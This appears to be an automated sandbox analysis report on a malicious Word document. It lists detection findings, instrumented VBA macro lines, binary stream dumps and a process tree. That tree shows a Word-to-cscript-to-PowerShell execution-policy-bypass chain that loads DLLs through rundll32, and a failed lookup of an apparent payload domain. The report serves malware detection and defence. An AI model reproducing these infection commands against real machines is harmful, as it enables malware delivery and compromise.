Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{\|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE\|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
Source: ~DF77272A7F6F18B150.TMP.0.dr	Stream path 'deutsche/o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM...................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{\|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE\|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
Source: ~DF26415DDA42946BBE.TMP.0.dr	Stream path 'o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM...................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{\|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE\|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation

OLE, VBA macro: Module Module3, Function eFile, String ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

Document contains an embedded VBA macro with suspicious strings

Source: sample.doc.doc	OLE, VBA macro line: RO = Environ("USERPROFILE") & "\AppData\Roaming\"
Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function eFile, String environ: RO = Environ("USERPROFILE") & "\AppData\Roaming\"	Name: eFile
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Environ_1_(jbxline, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Environ As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":Environ"
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Environ_1_ = Environ(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Environ = jbxtresh_Environ + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Environ_1_
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: RO = JbxHook_Environ_1_(20, "USERPROFILE") & "\AppData\Roaming\"

Document contains an embedded macro with GUI obfuscation

Source: sample.doc.doc

Stream path 'Macros/deutsche/o' : Found suspicious string wscript.shell in non macro stream

Yara signature match

Source: sample.doc.doc, type: SAMPLE

Document has an unknown application name

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE indicator application name: unknown
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE indicator application name: unknown
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE indicator application name: unknown
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE indicator application name: unknown

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: sample.doc.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen	Name: AutoOpen
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Sub AutoOpen()
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Set docNow = JbxHook_Open_1__ob_set(31, Documents, .SelectedItems(lr))

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Document contains no OLE stream with summary information

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE indicator has summary info: false
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE indicator has summary info: false
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE indicator has summary info: false
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE indicator has summary info: false

Document contains embedded VBA macros

Source: sample.doc.doc	OLE indicator, VBA macros: true
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE indicator, VBA macros: true

Source: sample.doc.doc	Virustotal: Detection: 50%
Source: sample.doc.doc	ReversingLabs: Detection: 60%

Source: C:\Windows\System32\cscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.......#.................4.....0.........4......./.....`I1........v.....................K8.....................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................/.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......n.e.d. .a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...0................=U.....>.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................/.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v....(.......0................=U.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................/.k......................n.............}..v....`.......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............(..k.....@U...............n.............}..v....(.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................/.k......................n.............}..v....`.......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............(..k.....@U...............n.............}..v............0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................/.k....@.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............(..k.....@U...............n.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................/.k....8.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............(..k.....@U...............n.............}..v............0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................/.k......................n.............}..v....(.......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w....... .......(..k.....@U...............n.............}..v............0................=U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................/.k....p.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............o.t. .b.e. .r.e.s.o.l.v.e.d.:. .'.l.o.t.o.l.a.n.d.s...c.o.m.'.".0................=U.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v............0................=U.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k....P.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k....P.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v.....!......0.......................R.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k....."................n.............}..v.....#......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v.....)......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k.....*................n.............}..v.....+......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v....H0......0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k.....1................n.............}..v.....1......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......(..k.....@U...............n.............}..v.....5......0................=U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k.....5................n.............}..v....H6......0...............H>U.............................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
